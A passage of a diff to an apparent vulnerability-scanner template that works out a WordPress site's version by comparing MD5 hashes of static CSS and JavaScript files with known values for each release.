- 5.2.2 + dsl: + - "(\"e9a54610ecb282dbc20f643c7cf88826\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"794fdfb3cf964780644b034fce9fa3cc\" == md5(body))" + - type: dsl + name: 4.4.20 - 4.4.24 + dsl: + - 
"(\"495178701107d00bcbbe5e22a528f4a7\" == md5(body))" + - type: dsl + name: 4.3.21 - 4.3.25 + dsl: + - "(\"a096d02a1c5453efa2353f6ae84e0edc\" == md5(body))" + - type: dsl + name: 4.2.25 - 4.2.29 + dsl: + - "(\"622927b82f5f2da5640fd9951c427e6e\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"9a6044f6a95fba2ccc9677358bbe0636\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"5ffe2bff63264b4e5a2fa4a78d1f9ace\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"d2778f59ff5acf2a20714145e226a57e\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"5cb288283c7772f5ee256ed4fa268a27\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"6d1effc3f68c5237eb414e2bddf3f98b\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"80feee694b2af663c10d9dba54277d36\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"a4c607508a8d4a640f49a68259f82e7d\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/block-editor.min.js" + matchers: + - type: dsl + name: 5.2 + dsl: + - "(\"d34ff4ff27d7fa2ccc1d763a30fafacf\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"16f721058fc92cf7ea8370c26468afb2\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"5b66060e4feb58f2e0a202c192d6200d\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"e6e27ef49195615b463c87a88ec2a344\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"0809e04dcb482d3d58d6ed4583a91317\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"d7d6cd35e4d2ec5d0d97d3dfd2b5907c\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"b90eaf940e8466e846c8093278fff7cc\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"9ea065431e81d79173a331e7cc39aaed\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"984146c92ba79d3cc6826eb4b74b13ce\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"6aa44bdd30f72a64c09407a77a56cbcd\" == md5(body))" + - 
type: dsl + name: 5.6 + dsl: + - "(\"4b523d8aab95c1b29b4a1f03da923379\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/block-editor.js" + matchers: + - type: dsl + name: 5.2 + dsl: + - "(\"bf3671bb7d3cd57cf469504f4ed0984d\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"76e1095617e4010135c2d398d9d8c2be\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"39a0a9870ad473ff94d0aa5f3c8c6bf4\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"4ae65914d30d7a00379dabebc4bf0727\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"3d83c9e397d94fae5c21f7ed3963cd98\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"6455689843f1f7de02d6876bf7b5286b\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"5f702adabf856834b3af0298d2fce54c\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"57dbdd04ec66190ee4d652c7f288de34\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"2d98d7b0fa43454b2d8ca1abc0062857\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"6c9f44b6af605c96b277f60d69fb8e7b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"1def645391a69a654a6ac415c639ac44\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/media-views.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"c2dc6122ad5ada23efd6dbb63cf4c3d7\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"07103bd9815f3c477bbf3f8af86c85ce\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"2a1ab38629d6f10178a0d200e7edaad1\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"b6ce54d1cb6e16133d28aa02dc38100e\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a6e655b44b1372c35d563b7904296ff7\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"ff33874b8a636d534226e66ff2bd87f2\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"1a18ff7798302a2acb623692d8d08fd9\" 
== md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"bbdb5de2ffa1378d42a1e0c1e47704d6\" == md5(body))" + - type: dsl + name: 4.0.2 - 4.0.32 + dsl: + - "(\"d57104d16ab5d91ce66d05d88c1be33d\" == md5(body))" + - type: dsl + name: 4.0.1 + dsl: + - "(\"de3d0b7763542b94e4c86cf8c423013f\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"260dcaf7e6e2827dbca061b824b13dd0\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"a95f22c6fa0fb98706d8893661499efa\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"3e32684f6b23d052378e1199045e920b\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"592e1ebf1392317ac258a26eedabee05\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"da980f717b09961e77acea1f0832d779\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"cad366eb2eaf38f62aa97c073a4277a3\" == md5(body))" + - type: dsl + name: 3.5 - 3.6.1 + dsl: + - "(\"31c7fd5c7249914b37af335db01fb3a8\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"f85ffada1056f95bb4f1a7454c2a7a55\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"f884a49215e3b86f5b00b70357048349\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6528f823f107c824a8f037d59747ee86\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"cd980ca68442d6c7958aa25a1602be22\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"4b4b0b4618bcc9b8f3627314d31c7858\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"5b158afe0b4df51c1046ffcf6fac142a\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"e091f05329e13e2443004079007c3b9a\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"d1f608c17b5120eeb7d99c90f769a38e\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"14b7e4860e20a6ad3bd8497601265757\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"68de126da7badcb321e311e942d81af9\" == md5(body))" + - type: dsl + name: 5.6 + 
dsl: + - "(\"2c1edf5b9efbdf9bddfe780f822368bd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/media-views-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"1320986de5f4c511d2d91d49594bb55e\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"75bcf36d04024586721bf54011740bb9\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"473143467093228d834df66130904558\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"c36750a3abc2cb8458d5019eb51c7e1c\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"283fbf3687b454b9af277c971112e1fe\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"b809a39abbf9269fb8ca45854dee66e7\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"745b6b6ebb69c22bc42f9780fe6a9f49\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"ed5f4318d41d867af5241b53202f52dd\" == md5(body))" + - type: dsl + name: 4.0.2 - 4.0.32 + dsl: + - "(\"14321055939c72056c29da4fac03ebf4\" == md5(body))" + - type: dsl + name: 4.0.1 + dsl: + - "(\"a119e12e638192f47f133c28c9c259c4\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"d1703dff57c8a79d200a3cd8671be1a3\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"00596a3f53c0ed5f0980487bec09e24b\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"ecf3c4b2f07fdae92ad2b7610afabe7f\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"40ecf9d68327bdeaeb7c50bf53483a4f\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"748955e10d038a00280de9ffe656f09d\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"7dff4cd1a1c6a83b48aa548a885d9368\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"d2d68944a09ea1e709f2f0167c9ed0d5\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"d88590682bee1fa2d8e8fd2098613e1e\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - 
"(\"43dba56c280798e030a3eb57d13d117d\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"cfa39e76d5951ec19fb374fcc68722a4\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2731739447719c2c138c09d4effe827e\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"6f46bbbba6d72269891ebf1db8e43d1f\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"c72ac701e7e8604deef6d6b554c77d41\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"fcb870e743c4db730c63c9d050b22dde\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"e7433c5d289d445bbfe8592e637916fc\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"ca85d793557e7f488c1f3a4efa5e312b\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"59e457e75b241e4d9332bf32b9376d9a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5ee99fab2abde70aa52780512dd604b5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"0e9401a708382afec03c638511dd6817\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/common.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"25d6aacf8fe73d5b07b4e82751479f05\" == md5(body))" + - type: dsl + name: 4.7.5 - 4.7.19 + dsl: + - "(\"6f2235eef66da7f38777c524a9c36205\" == md5(body))" + - type: dsl + name: 4.7.3 - 4.7.4 + dsl: + - "(\"a4a413ce024e8152e0f8956011d325fa\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.2 + dsl: + - "(\"adc2e2546deb48d1564f5392650d2a05\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"f963adf2a7fb1a7c1c4199e204fc0d20\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"fa1a35d8d7342fbcfd255b456415e0c3\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.24 + dsl: + - "(\"e4400cac6b36526d679230e8b9dd9f1d\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"f83bef152421e22d8f14f2fb344f3410\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"b9c9f646d31ae6d74e97bc6b4d4a5c0a\" == 
md5(body))" + - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"3be9a7101e7a7635833c7321cf2017e5\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.2 + dsl: + - "(\"d3a3f5d88670f6fea04b6f523f67b528\" == md5(body))" + - type: dsl + name: 4.1.1 - 4.1.32 + dsl: + - "(\"d16dd6c3f76ad777188cc5708adda0c3\" == md5(body))" + - type: dsl + name: 4.1 + dsl: + - "(\"a915138d60305201313066d43c61a2f6\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"24e5c1257b59677997a60bf7035f16c5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"1cd324e7b6c46227e0f302337e762bcd\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.33 + dsl: + - "(\"4f9383d80d7b2a9947e9de21451226f9\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"58f2b7e3399f78ca0ab6aaa0a826bafc\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.33 + dsl: + - "(\"886b5ea55729f7016211cf324af5e897\" == md5(body))" + - type: dsl + name: 3.6.1 + dsl: + - "(\"b45d244b6669aef59434fc30265f01f9\" == md5(body))" + - type: dsl + name: 3.6 + dsl: + - "(\"bfe3d59f6e7d5045d07f9835827d1324\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"4b224e92257f97279f786973002b496d\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"febc435f5a360e41a7b2b6cb2368af70\" == md5(body))" + - type: dsl + name: 5.1 - 5.2.9 + dsl: + - "(\"565c5b71c17d0f75bdeea5361b44b599\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"617d7413ace49ebdbde150e781a0fc64\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"b11a0315c72981b2196bbe2bdcf0f75d\" == md5(body))" + - type: dsl + name: 3.8.34 - 3.8.35 + dsl: + - "(\"7cf98465a10b9d8c17cb3ea03a485875\" == md5(body))" + - type: dsl + name: 3.7.34 - 3.7.35 + dsl: + - "(\"58d9399f392d2fed4fa0430a68d53258\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"c9bd46200ead1003ef035b256ba9152f\" == md5(body))" + - type: dsl + name: 5.5.1 - 5.5.3 + dsl: + - "(\"d882c62db3212caee8464d76f47eae4a\" == md5(body))" + - type: dsl + name: 
5.6 + dsl: + - "(\"fd645ad5b0c96e6aa8bdc86c29bf998f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/editor.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"177b13403b4c1d6ea0025572ac1b0b12\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"e97b439d9f0c638e88d8a4cc21823025\" == md5(body))" + - type: dsl + name: 4.6.1 - 4.6.20 + dsl: + - "(\"2bb48c16cf49b06d70fea86fe99edfff\" == md5(body))" + - type: dsl + name: 4.6 + dsl: + - "(\"4016c604bcec8a6544c2c966cb8e6925\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"73eb43b774ec35091006e8d0d8b41eb1\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"aa25a3e29dd3a6af01e4fb6f80db10be\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"624d68ea15072444280b4f4e4f4522ec\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"4a459a304909052c6cdf05393599790b\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"a87f03a14efd9b8531164dac272aa07c\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"1cbc0ca7cf2f6a0991a4da7cad7bd9c0\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"b5f9c498a1098ebdfbc2fa321f8bdf40\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"9ed346f17ea5f8a7d4f30d96003de9b1\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"3b4ec67bdb6e4f311418ac5b8c302005\" == md5(body))" + - type: dsl + name: 3.7 - 3.7.35 + dsl: + - "(\"17f5a58fc4d053bffb8cb79efbb603a0\" == md5(body))" + - type: dsl + name: 3.6 - 3.6.1 + dsl: + - "(\"c599b07c5f3d814e9d0adf6ae57885df\" == md5(body))" + - type: dsl + name: 3.5.1 - 3.5.2 + dsl: + - "(\"fc895acd6895683e3014a5f5e7d9cbed\" == md5(body))" + - type: dsl + name: 3.5 + dsl: + - "(\"aa297505c208b2b6860af82106d985ca\" == md5(body))" + - type: dsl + name: 3.4.2 + dsl: + - "(\"84a599e6afa0ba8b5a00af97787ac52d\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.1 + dsl: + - 
"(\"492999721e753fc439107d980fd6f1bb\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"7234119d4cfae6ce5b9ad7689bde2b27\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.5 + dsl: + - "(\"861f75019aa280e0b92aa0f9c9b84eaf\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.16 + dsl: + - "(\"2ec44853d924b9eb24ff3cde0986aaaf\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"049a4b5288c49f627f02b150bc28a8be\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8f9006245f6630fe4dd7c0768668ea6d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"517db4d19d1e3484a0339dc765cd3902\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"c449b708d25d875ac9266227666fef95\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.4.4 + dsl: + - "(\"b440cfaf53dc78b60e479c8e43df12d1\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"1e7b5cfcfc656cad1c8dcd3bb09ee8ca\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6c1db6b35d1f5b39a367f03fbbb6363e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/dashboard.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"702dabe21678b2f96b0c3fac9ca9eecf\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.19 + dsl: + - "(\"ede40a4a2c18bee8b93c01f7e55245a8\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"b5bac004a9dd8890f14b020f7f548040\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"e97cda60d14a219554405c5df6047a54\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"ef190537aee285d82bb5fe4c5da5e769\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"c178ee058ec19c709f30baed82db8392\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"68e539081693b1ed4a42bf1c284004e6\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"8f73d561f6b239083463a5b1ea50d035\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - 
"(\"31d0d7ea28f6021402faeb6c25b7f24b\" == md5(body))" + - type: dsl + name: 3.2.1 + dsl: + - "(\"319ae2dfe4ba7ad0b5c1da8c5035205d\" == md5(body))" + - type: dsl + name: 3.2 + dsl: + - "(\"1e3ac8152f5ff972260ce1bd50bde322\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + dsl: + - "(\"7e89f21add33a9ee22decb147300999a\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"41abd505872ec8ad7625b81f5127546d\" == md5(body))" + - type: dsl + name: 2.9 - 2.9.2 + dsl: + - "(\"0b99a456a17fe95b10a8c7cf90d62303\" == md5(body))" + - type: dsl + name: 2.8 - 2.8.6 + dsl: + - "(\"9c505ae63a80736883260c90740e2e7c\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"0e0efc8f81e44620d3e1b3360fb8c492\" == md5(body))" + - type: dsl + name: 2.5 - 2.6.5 + dsl: + - "(\"2b1e8f9afa852875136abc86f8db2971\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.7 + dsl: + - "(\"f43654c38bdb2158af5d710dba80f5bd\" == md5(body))" + - type: dsl + name: 4.9.8 + dsl: + - "(\"1b298abbb4fc1c8a793ab429afbac7a7\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"1aef04d8948c142c1e238d7c5d261a1c\" == md5(body))" + - type: dsl + name: 4.9.9 + dsl: + - "(\"117c2f9b3f7bb835979c8181c4bb4487\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"eba9cfc7bfc0ee9b9b41b6e57b951076\" == md5(body))" + - type: dsl + name: 4.9.10 - 4.9.16 + dsl: + - "(\"776fe952791cbf65cbef30a3828f94dc\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e75bc9587fbb4bbf66b3e6165c4b96d2\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"7ef55edc418714bcd23d68126ad77914\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"6de79274a839f563f9c4233eaf2c41d0\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c155cc474428d39c756c4d0b259e0fda\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9142efd37952e7c5975acae53d56774b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"baaf01bcea21f0d7518fdbb36fee9134\" == md5(body))" 
+ - method: GET + path: + - "{{BaseURL}}/wp-includes/css/media-views-rtl.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"e9b56ecbae4ea9a783fbbd5c7d600e2a\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"501cf1920c7156d8fc36d09906b89b96\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"0f5b4dc649f5d2218067a8c37e7c1bab\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"fa5c93754d9aaef90f7e56b8f530953f\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"a00d887d69696c4469e02f21cce67a2c\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"fe2e1045e95e3356a585bb83c8958fe0\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"ce5832715f15e339b10f1f35564c1e54\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"113badd2d3bd1c9cec6ae9b51cf9d14a\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"596175f22e2a4fda17b151a548d943dc\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"d290d20fcf52a06c1576ce599294b0ec\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"fa31efdb33a5f6043c48bf062b78d306\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - "(\"0896c8e772550ccc25dbf41ad56828f6\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"eda317820fb1056837abb407ce52dd04\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"340776735208b7aa98106a0ac81ebeba\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"82886b7f245be648136f1d1633d7679d\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"d8606417bf53703b949f2b69f20950cd\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"03376b367c5b4d20cf8b8f4bc57f9899\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"fb3b1ff76a82bbf28c67694645d20343\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"b428a1ab8ea43aa8b32f70f567adbbcd\" == md5(body))" + - type: dsl + name: 5.2 - 
5.2.2 + dsl: + - "(\"dfd4a99ee490100037c2fffb64b476af\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"7953c80077f3153b928f51614f2e1d73\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"cd9ae7fa20656d6518f8b02d41f543cd\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"aa26cc77c06589e911cab9b7a0e1f948\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"9df090212f0362c5ce6510e574a8bedf\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"8664869848abca0bd76593b7940f229c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"74c9253d442013dc9c4004e7fb5f8ad0\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3853f794c6941d2d221ffb81d657bab0\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/media-views.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"0e78a2b0ea5e6d76af956e6db3c6d387\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"8da4dec91cff43f7f5dc6e44746ed049\" == md5(body))" + - type: dsl + name: 4.6 - 4.7.3 + dsl: + - "(\"251ddd705433c207dac4dc90b01abbe3\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"fbadbb1f370542f387ec6449a41869a5\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"5c63b51785fe9035948a1556dfec5204\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"6002f66791922cb455a1cbdcfb3e5d6e\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"cec1bd5b35322ae89736b592fd56f90d\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"34039211eb84b4c4ef8f040e7da8fb01\" == md5(body))" + - type: dsl + name: 4.0.1 - 4.0.32 + dsl: + - "(\"c3b623bad8cdeb9189d7ee1e6c4b6840\" == md5(body))" + - type: dsl + name: 4.0 + dsl: + - "(\"a1ed9196e49fd033bff15737cbd393ef\" == md5(body))" + - type: dsl + name: 3.9.1 - 3.9.33 + dsl: + - "(\"b15bc1e4a10cd3cd2e9e1a8af26cb82c\" == md5(body))" + - type: dsl + name: 3.9 + dsl: + - 
"(\"d88c98cdb5bf2fe29417d2b92f5288c7\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"fe5dfd54c06a5ca076027fb6463d53e0\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"0642e47790eb3ebff77ad8451b11bf7d\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"a11a31cf8171325483629eaf4cadfe2e\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"49800720b23abe08b209608f73d2c60d\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"4812195c34e86b684243abbc1d8d1798\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6754ac27669188d7fe33c6699290101a\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"830d9f3be0c02ffb4bea5a1bbc8c342c\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"f78d67d8230c458780252e608257665e\" == md5(body))" + - type: dsl + name: 5.3 + dsl: + - "(\"9fbd0c31aaf5fd708bad7ceae55cd1c6\" == md5(body))" + - type: dsl + name: 5.3.1 - 5.3.6 + dsl: + - "(\"4085d31428188b517d4cdc6ed54e9ba1\" == md5(body))" + - type: dsl + name: 5.4 + dsl: + - "(\"d37e9d97322d003a59cceed023ae1627\" == md5(body))" + - type: dsl + name: 5.4.1 - 5.4.4 + dsl: + - "(\"0de070a44c7ba72af44ccd496608395c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"de068d48d84fefc1c50a0b65253b7d41\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"18cb9cc6eb79acab95454d92d1a6832a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/forms.css" + matchers: + - type: dsl + name: 